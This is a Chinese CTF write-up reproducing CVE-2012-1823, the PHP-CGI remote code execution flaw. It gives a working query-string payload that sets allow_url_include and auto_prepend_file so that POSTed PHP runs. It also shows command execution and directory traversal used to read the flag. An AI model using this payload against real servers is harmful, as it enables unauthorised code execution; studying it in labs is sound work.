首页 > 编程语言 >漏洞复现之CVE-2012-1823(PHP-CGI远程代码执行)

漏洞复现之CVE-2012-1823(PHP-CGI远程代码执行)

时间:2024-06-18 15:10:20浏览次数:22  
标签:CGI info php .. flag 代码执行 CVE

关于CGI知识点
CGI模式下的参数:

-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

题目如下图,没有什么发现

目录扫描一下

dirsearch -u http://47.96.234.169:32349/

发现info.php,直接访问/info.php

可以发现其php版本为5.4.1,而且可以看到一个cve字样:cve20121823
参考博客[https://blog.csdn.net/qq_36374896/article/details/84102239?spm=1001.2014.3001.5506]
然后我们使用burp抓包,便于观察回显

  1. 首先我们使用-s命令查看一下源代码

    可以准确得到源码<?php phpinfo();
  2. 接着我们使用-d 指定配置项,这里我们可以结合post请求执行命令

?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input #payload

#post请求内容


可以看到当前用户的名称为“www-data”
3. 然后我们使用ls命令列一下目录

得到index.php和info.php,使用cat命令查看一下index.php

提示我们这里没什么东西,我们猜测flag可能在根目录下,目录穿越一下

ls ../../../

发现flag,查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}
cat ../../../flag

标签:CGI,info,php,..,flag,代码执行,CVE
From: https://www.cnblogs.com/Spade-K/p/18254409

相关文章

  • Windows CSC提权漏洞复现(CVE-2024-26229)
    漏洞信息WindowsCSC服务特权提升漏洞。当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从......
  • ArcGIS Pro SDK (四)框架 1
    ArcGISProSDK框架1目录ArcGISProSDK框架11如何在停靠窗格可见或隐藏时订阅和取消订阅事件2执行命令3设置当前工具4激活选项卡5激活/停用状态-修改条件6确定应用程序是否繁忙7获取应用程序主窗口8关闭ArcGISPro9获取ArcGIS专业版10关闭特定窗格1......
  • 远程代码执行和远程命令执行是一个东西吗
    远程代码执行(RemoteCodeExecution,简称RCE)和远程命令执行在概念上有所区别,但两者都涉及到攻击者通过远程方式在目标系统上执行代码或命令。以下是两者的详细比较:定义:远程代码执行(RCE):指攻击者可能通过远程调用的方式,在目标计算机设备上执行恶意代码,从而控制该设备。这通......
  • ncverilog与finesim联合进行混合仿真的详细过程(以spice为顶层)
    第一步:Makefile仿真命令one:ncverilog+access+rwc+nc64bit+loadvpi=finesim.so:finesim_startup-frun.f第二步:环境结构(1)以模拟为顶层,顾名思义是把CDL网表中某一个模块替换为数字的function,其余全是CDL,以上图为例,把其中inv替换为数字的function。(2)需要文件:testben......
  • ArcGIS JSAPI 高级教程 - ArcGIS Maps SDK for JavaScript - 添加自定义(GLSL)数据
    ArcGISJSAPI高级教程-ArcGISMapsSDKforJavaScript-添加自定义(GLSL)数据核心代码完整代码在线示例ArcGISMapsSDKforJavaScript从4.29开始增加RenderNode类,可以添加数据以及操作FBO(ManagedFBO);通过操作FBO,可以通过后处理实现很多效果,官方提供了几......
  • GIS之arcgis系列09:arcpy实现克里金差值
    矢量点数据经过克里金差值后可以转换成栅格数据,那么就需要了解一下什么是克里金差值。什么是克里金法?IDW(反距离加权法)和样条函数法插值工具被称为确定性插值方法,因为这些方法直接基于周围的测量值或确定生成表面的平滑度的指定数学公式。第二类插值方法由地统计方法(......
  • pgAdmin未授权命令执行漏洞(CVE-2022-4223)
    ​https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v5.7/source/pgadmin4-5.7.tar.gz 下载pgadmin5.7的源码首先从代码层面进行分析接口 /validate_binary_path​最后调用了 subprocess.getoutput(​来执行了命令这一部分代码是对传入的路径进行检测,如果是在linu......
  • 通过 Python 进行 ArcGIS 环境设置
    在ArcGIS中,环境设置可用于确保在控制环境下执行地理处理,您可以在控制环境中决定将处理限制到特定地理区域的处理范围、所有输出地理数据集的坐标系或输出栅格数据集的像元大小等。本文将以核密度分析为例,介绍通过Python进行ArcGISPro环境设置的方法。1导入相关模块impor......
  • PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
    0x01产品简介PHP-CGI 是一种用于在 Web 服务器上运行 PHP 脚本的接口,通过 CGI(公共网关接口)将 PHP 解释器与 Web 服务器连接。0x02漏洞概述2024年6月,PHP官方发布新版本,修复了 PHP-CGI 中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取......
  • ArcGIS和ArcGIS Pro快速加载ArcGIS历史影像World Imagery Wayback
    ArcGIS在线历史影像网站WorldImagery Wayback(网址:https://livingatlas.arcgis.com/wayback/)提供了数期历史影像在线浏览服务,之前不少自媒体作者在文中宣称其能代表GoogleEarth历史影像。1、一点对比(1)同一级别下的版本覆盖面以下述区域为例,自2014年2月20日至2022年5月18......